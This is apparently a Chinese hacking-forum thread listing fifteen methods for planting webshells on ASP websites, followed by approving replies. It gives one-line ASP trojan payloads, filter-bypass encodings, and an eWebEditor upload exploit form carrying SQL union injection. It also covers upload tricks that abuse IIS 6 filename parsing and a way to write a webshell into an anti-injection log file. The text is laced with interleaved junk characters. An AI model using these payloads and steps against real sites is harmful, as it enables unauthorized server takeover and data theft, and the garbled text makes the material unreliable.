返回列表 发帖

[原创文章] asp拿shell

1.有备份,上传图片备份。如不能修改文件后缀名,可备份成1.asp/1.mdb或1.asa/1.mdb的形式! E8 T  f5 R2 j) F! E

7 E+ F3 |5 D, u3 x" v2.写入配置文件一句话木马,如果过滤了<,%,>,(,)可尝试&#60;&#37;eval request&#40;&#34;value&#34;&#41;&#37;&#62;来突破,例如config.asp7 a1 b* i: D: r" j& n% D4 j. Z1 Q

0 O! g) b% o: r; l! m3.上传漏洞:
! c5 |8 y2 F2 V6 x  w- F3 q
% B9 k( O  c, b$ o7 m8 i动网上传漏洞:抓包nc提交,其中路径可改为zjq.asp 的形式,空格替换成0x00
6 G9 p# M6 k2 b+ A* d
6 }: [/ ]9 ^1 Y0 p/ v# |  S: `* ^逻辑上传漏洞:同时上传两个文件,第一个为正常文件,第二个为iis可解析后缀文件+ {+ z6 v% t5 ^% n

6 g' D; x, b3 \4 n9 s8 i, N" P: u雷池上传漏洞:http://localhost/leichinews/admin/uploadPic.asp?actionType=mod&picName=test.asp
9 u2 i* @/ `" {1 ?1 ]7 C! N" K然后在上传文件里面填要传的图片格式的ASP木马
3 ]8 h( O! A! }/ h! v' V, }就可以在uppic目录下上传文件名为test.asp的文件uppic/test.asp# b9 I* p& D7 j! ~8 d8 `
4.ewebeditor:有后台添加asa或aaspsp上传类型,前提要进入后台。没后台如2.16版本可利用如下代码上传1 C' ?5 E; g8 M" A: H. f5 `( K9 `
- _8 f/ L: s) b4 W* N
<html>
  R2 |+ }8 u3 ]0 _1 O- m- M3 M<head>. {, s7 q; J* @7 Z
<title>ewebeditor upload.asp上传利用</title>
1 w2 N, y9 l$ C</head>
( c5 ]( \3 H; B3 q! C* }<body>5 Q/ A# B* |* ?& I1 a8 ~9 E& k
<form action="upload.asp?action=save&type=IMAGE&style=luoye' union select S_ID,S_Name,S_Dir,S_CSS,S_UploadDir,S_Width,S_Height,S_Memo,S_IsSys,S_FileExt,S_FlashExt, [S_ImageExt]%2b'|cer',S_MediaExt,S_FileSize,S_FlashSize,S_ImageSize,S_MediaSize,S_StateFlag,S_DetectFromWord,S_InitMode,S_BaseUrl from ewebeditor_style where s_name='standard' and 'a'='a" method=post name=myform enctype="multipart/form-data">( t0 p3 g. t1 P3 p  a$ o. I
<input type=file name=uploadfile size=100><br><br>8 P$ C, @: H5 c, V+ z
<input type=submit value=Fuck>
. N4 C1 v3 C' S5 c# d6 k( b</form>
6 m8 y% H% ?! I</body>% {- G7 S- e3 `% l: h
</form>
- G4 U8 f$ r& x+ h3 t: B- x- S3 z8 N, o</html>
* t" o8 W9 a% o1 Y5 W# o2 L8 N+ r& F2 z1 K  H- d. m( j6 n9 k- W
2.8般亦可以利用admin_uploadfile.asp?id=14&dir=..列目录,前提是此文件可访问,或cookie欺骗后可访问4 y& W3 @5 V2 M3 r7 s5 s- P
5.fckeditor:/FCKeditor/editor/filemanager/browser/default/browser.html?Type=Image&Connector=connectors/asp/connector.asp: I. b# d5 {1 f; u

4 D" G# N) E6 X0 Q利用windows2003解析。建立zjq.asp的文件夹8 y1 L, `: O7 X; o- d+ g* n

! }4 H6 D: ]& w* I$ `. X. g/ V6.southidceditor:admin/SouthidcEditor/Admin_Style.asp?action=styleset&id=47。修改上传类型
4 D! [0 K+ K! c3 j! j: I+ A7 b& d% [' u0 ~) v) b2 v( R5 ~' G: g
7.cuteeditor:类似ewebeditor$ Q: u+ R/ e2 w( o3 c$ T+ j" v0 W2 @

: W5 V) i) q" d( d8.htmleditor:同上. G$ U2 x, A0 r7 E6 `2 p, k
7 h6 a; t2 N1 U' Q0 A: U  y
9.插数据库一句话。前提是知道数据库路径,为asp,asa等后缀,无防下载表,有防下载表可尝试插入以下语句突破0 X( Q& o+ g$ H7 `

; S% P  L! Z) h" b, D# X8 O<%execute request("value")%><%'<% loop <%:%>
# }" k, {7 B8 s9 e6 l( C/ K
  P% l: z# ^, ~8 Z! t<%'<% loop <%:%><%execute request("value")%>- m0 [6 B6 t. q* D- j  y1 C5 N0 K' ^
. z; @% ]' n, u5 L9 }% _. Y
<%execute request("value")'<% loop <%:%>
" K; g/ I4 ~2 ~" }: R$ n7 t9.查看cookie,看上传路径是否为cookie记录,可修改为*.asp的形式,利用2003解析漏洞2 _. V9 T; W) ?6 _0 U9 o2 b
" N, b$ O; ~4 y$ I* S
10.上传不重命名文件,可上传zjq.asp;zjq.jpg的文件,iis6.0解析漏洞, b, m9 v& Y' H2 i, q. O* p* F, s9 U

3 G% h. M5 ~- ^! [4 t! a. C11.注册用户名为zjq.asp,前提是网站会根据用户名新建一个以用户名命名的文件夹,上传正常图片木马,利用2k3. y3 |' G6 ?- n( h8 }

- ~" H+ c# L1 S解析漏洞得到webshell
0 q. @$ w- n7 u. c' r0 m8 @3 l6 Y6 P" A
12.mssql差异备份,日志备份,前提需知道web路径+ q9 v  }- u/ W9 h. W$ v7 t

. ?7 O+ n. N5 R' c13.先备份数据库(拿到shell便于恢复网站访问),上传图片shell,数据库为asp,asa等后缀,恢复数据库填写图片路径,速度要快,因为恢复完网站就不能正常访问,一句话连接得webshell( O* r0 Y$ C! K1 [% V; R' V% Y* l
. X( j( _9 ~9 s; Z! |) w7 B
14.添加上传类型php,并上传phpshell,前提服务器能解析php,例如dvbbs8.2后台拿shell4 o9 N5 x* V% ?0 c8 U! x

( z. ]& `9 v+ d* D15.有些系统用的是防注入程序,数据库默认为sqlin.asp,我们可以www.xx.com/*.asp?id=1'<script language=VBScript runat=server>execute(request("zjq"))</Script>,这样就会在sqlin.asp中写入一句话shell,连接即可2 \. e4 K  C5 z2 S5 l& S

# }# y" {" I3 d& h: w以上只是本人的一些拙见,并不完善,以后想到了再继续添加  g4 ^8 @( y+ }2 {; g4 k9 U
不是我原创。我的朋友,飞鸟游鱼原创的
2

评分人数

  • 1335csy

  • 超超

好东西能分享 谢谢!!!

TOP

kankankankan
1

TOP

写的很不错

TOP

1# yyw258520 8 L" W) H: Y6 A8 i/ f8 b
* G% n. n2 x0 @6 Q

7 ^1 O; v+ K: [2 q很好啊、基本的入侵方法都包含了6 n; J8 }- \1 i* f6 A

( h) g2 x+ T7 M0 X# j, k3 y3 _( K最好来个提权的帖子再。
  S" X3 P8 e0 i: N2 E# Y
% v2 Q9 y) {2 _/ Y不要网上百度的。

TOP

提权才是王道。

TOP

不错哦 呵呵 学习了

TOP

谢谢楼主分享技术。。。

TOP

返回列表